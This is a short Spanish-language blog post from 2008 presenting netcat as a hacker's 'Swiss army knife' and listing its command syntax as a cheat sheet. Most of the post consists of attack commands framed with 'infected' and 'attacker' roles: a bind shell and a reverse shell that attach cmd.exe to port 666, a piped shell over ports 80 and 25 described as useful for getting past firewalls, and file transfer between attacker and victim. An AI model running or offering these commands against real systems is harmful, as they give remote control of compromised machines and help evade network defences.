Herramientas

Netcat, La navaja suiza

Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

Me pareció buena idea poner las sintaxis de ejecución de netcat ya que siempre es muy útil tenerlas a la mano.

Las resumiré en unas pocas líneas:

Shell en escucha por puerto 666 con netcat

Infectado:
NC -l -d -e cmd.exe -p 666

Atacante:
NC -vv IP 666

Shell inversa por puerto 666 con netcat

Atacante:
NC –vv –l –p 666

Infectado:
NC -d -e cmd.exe IP 666

Shell pipeada con netcat ( útil para pasar FW ).

Atacante:
Recepción de datos puerto: 80 [HTTP]
Envío de datos puerto: 25 [SMTP]

Infectado:
NC IP 80 | cmd.exe | NC IP 25

Transferencia de archivos con netcat

Atacante
NC -l -p 666 < FILE

Infectado:
NC IP 666 > FILE

© 2008 Aztek Mindz.